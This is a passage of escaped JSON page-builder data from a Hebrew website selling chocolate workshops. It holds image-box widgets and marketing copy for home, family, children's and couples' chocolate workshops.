\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7. <\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h3><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h3><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 